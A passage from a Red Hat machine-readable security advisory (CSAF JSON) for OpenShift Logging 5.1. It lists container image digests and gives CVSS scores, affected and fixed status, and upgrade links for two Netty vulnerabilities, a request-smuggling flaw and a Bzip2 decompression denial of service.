"openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { 
"category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le" }, "product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64 as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64" }, "product_reference": "openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le" }, "product_reference": "openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x as a component of OpenShift Logging 5.1", "product_id": 
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x" }, "product_reference": "openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64 as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64" }, "product_reference": "openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x" }, "product_reference": "openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le" }, "product_reference": "openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", 
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x" }, "product_reference": "openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le" }, "product_reference": "openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64 as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" }, "product_reference": "openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-21409", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2021-03-30T00:00:00+00:00", 
"flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", 
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1944888" } ], "notes": [ { "category": "description", "text": "A flaw was found in Netty. There is an issue where the content-length header is not validated correctly if the request uses a single Http2HeaderFrame with the endstream set to true. This flaw leads to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. The highest threat from this vulnerability is to integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "netty: Request smuggling via content-length header", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Satellite ships a vulnerable Netty version embedded in Candlepin. 
However, it is not directly vulnerable since the HTTP requests are handled by Tomcat and not by Netty.\nRed Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.\n\nIn OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of netty-codec-http package.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le" ], "known_not_affected": [ "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", 
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", 
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21409" }, { "category": "external", "summary": "RHBZ#1944888", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944888" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21409", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21409" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409" }, { "category": "external", "summary": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32", "url": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32" } ], "release_date": "2021-03-30T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T18:09:12+00:00", "details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.1, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html", "product_ids": [ 
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5128" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", 
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", 
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "netty: Request smuggling via content-length header" }, { "cve": "CVE-2021-37136", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-09-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", 
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2004133" } ], "notes": [ { "category": "description", "text": "A flaw was found in Netty\u0027s netty-codec due to size restrictions for decompressed data in the Bzip2Decoder. 
By sending a specially-crafted input, a remote attacker could cause a denial of service.", "title": "Vulnerability description" }, { "category": "summary", "text": "netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data", "title": "Vulnerability summary" }, { "category": "other", "text": "In the OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack ship the vulnerable version of netty-codec package. Since the release of OCP 4.6, the Metering product has been deprecated [1], so the affected components are marked as wontfix. This may be fixed in the future.\n\nStarting in OCP 4.7, the elasticsearch component is shipping as a part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8). The elasticsearch component delivered in OCP 4.6 is marked as `Out of support scope` because these versions are already under Maintenance Phase of the support.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le" ], "known_not_affected": [ 
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", 